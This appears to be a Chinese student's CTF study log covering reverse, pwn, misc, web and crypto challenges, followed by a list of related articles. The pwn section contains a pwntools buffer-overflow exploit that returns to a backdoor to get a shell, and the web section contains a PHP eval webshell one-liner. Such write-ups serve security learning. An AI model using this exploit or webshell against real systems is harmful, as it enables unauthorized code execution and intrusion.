2.7学习记录

embedded/2025/2/5 7:48:01/

re

[WUSTCTF2020]Cr0ssfun

得到附件先查壳在这里插入图片描述无壳elf64位文件,放进ida查看主调函数在这里插入图片描述往下追踪,发现7部分相似的结构,给的数字看上去像是ASCII码,对照码表把7部分串联起来在这里插入图片描述得到:wctf2020{cpp_@nd_r3verse_@re_fun}

pwn

rip

先查壳在这里插入图片描述发现没有保护,64位elf文件,放ida里看看在这里插入图片描述发现后门函数,在主调函数处发现gets函数,存在栈溢出在这里插入图片描述控制程序返回到0x40201B,就可以得到系统的shell了
exp

from pwn import  *  #调用pwntools库r = remote('node3.buuoj.cn',27542)     #远程连接offset = 0xF + 8    #偏移量
payload = offset * 'a' + p64(0x40201B)  #漏洞利用r.sendline(payload)		#发送漏洞
r.interactive()		#远程交互

misc

LSB

这题题目是校徽,根据提示猜测是lsb隐写
在这里插入图片描述采用stegsolve工具在这里插入图片描述调整最低位宽,之后点击Save Bin保存文件,发现是个二维码,用cqr扫描即可

web

[极客大挑战 2019]Knife

在这里插入图片描述根据提示构造木马

/?<?php eval($_POST["Syc"]);?>

之后用蚁剑连接即可在这里插入图片描述找到flag了在这里插入图片描述

crypto

Alice与Bob

题目描述很有意思:密码学历史中,有两位知名的杰出人物,Alice和Bob。他们的爱情经过置换和轮加密也难以混淆,即使是没有身份认证也可以知根知底。就像在数学王国中的素数一样,孤傲又热情。下面是一个大整数:98554799767,请分解为两个素数,分解后,小的放前面,大的放后面,合成一个新的数字,进行md5的32位小写哈希,提交答案。
用在线工具分解在这里插入图片描述安装题目要求排列一下即可,得到flag{d450209323a847c8d01c6be47c81811a}


http://www.ppmy.cn/embedded/159693.html

相关文章

4 前置技术(下):git使用

提示&#xff1a;文章写完后&#xff0c;目录可以自动生成&#xff0c;如何生成可参考右边的帮助文档 文章目录 前言 前言

深入解析“legit”的地道用法——从俚语到正式表达:Sam Altman用来形容DeepSeek: legit invigorating(真的令人振奋)

深入解析“legit”的地道用法——从俚语到正式表达 一、引言 在社交媒体、科技圈甚至日常对话中&#xff0c;我们经常会看到或听到“legit”这个词。比如最近 Sam Altman 在 X&#xff08;原 Twitter&#xff09;上发的一条帖子中写道&#xff1a; we will obviously deliver …

从零开始的Python小项目:用Pygame制作贪吃蛇游戏

目录 1. 概述 2. 环境准备 3. 初始化游戏 4. 定义游戏参数 5. 辅助工作 6. 游戏主循环 7. 启动&#xff01; 8. 后续工作 9. 完整代码 闲来无事&#xff0c;想自己做点游戏玩玩&#xff0c;之前用C写了很多游戏&#xff0c;但都是基于dos窗口的&#xff0c;太枯燥了。…

【2025年数学建模美赛F题】(顶刊论文绘图)模型代码+论文

全球网络犯罪与网络安全政策的多维度分析及效能评估 摘要1 Introduction1.1 Problem Background1.2Restatement of the Problem1.3 Literature Review1.4 Our Work 2 Assumptions and Justifications数据完整性与可靠性假设&#xff1a;法律政策独立性假设&#xff1a;人口统计…

vue3 store刷新失效场景解决方案

1. 安装 vuex-persistedstate 插件 vuex-persistedstate 是一个常用的插件&#xff0c;可以方便地将 Vuex 状态持久化到 localStorage 或 sessionStorage 中 npm install vuex-persistedstate2. 配置 Vuex Store 使用 sessionStorage // store/index.js import { createStore }…

基于Springboot框架的学术期刊遴选服务-项目演示

项目介绍 本课程演示的是一款 基于Javaweb的水果超市管理系统&#xff0c;主要针对计算机相关专业的正在做毕设的学生与需要项目实战练习的 Java 学习者。 1.包含&#xff1a;项目源码、项目文档、数据库脚本、软件工具等所有资料 2.带你从零开始部署运行本套系统 3.该项目附…

《LLM大语言模型深度探索与实践:构建智能应用的新范式,融合代理与数据库的高级整合》

文章目录 Langchain的定义Langchain的组成三个核心组件实现整个核心组成部分 为什么要使用LangchainLangchain的底层原理Langchain实战操作LangSmithLangChain调用LLM安装openAI库-国内镜像源代码运行结果小结 使用Langchain的提示模板部署Langchain程序安装langserve代码请求格…

爱快 IK-W35 面板式AP 简单开箱评测和拆解,双频WiFi6 AX3000,2.5G网口

爱快&#xff08;iKuai&#xff09; IK-W35 面板式AP 简单开箱评测和拆解&#xff0c;双频Wi-Fi6 AX3000&#xff0c;2.5G网口 用的爱快系统做软路由&#xff0c;干脆把原先的TP路由都换成爱快的AP&#xff0c;一套ACAP&#xff0c;方便管理。 2.5G PoE交换机 TL-SE2109P 简单…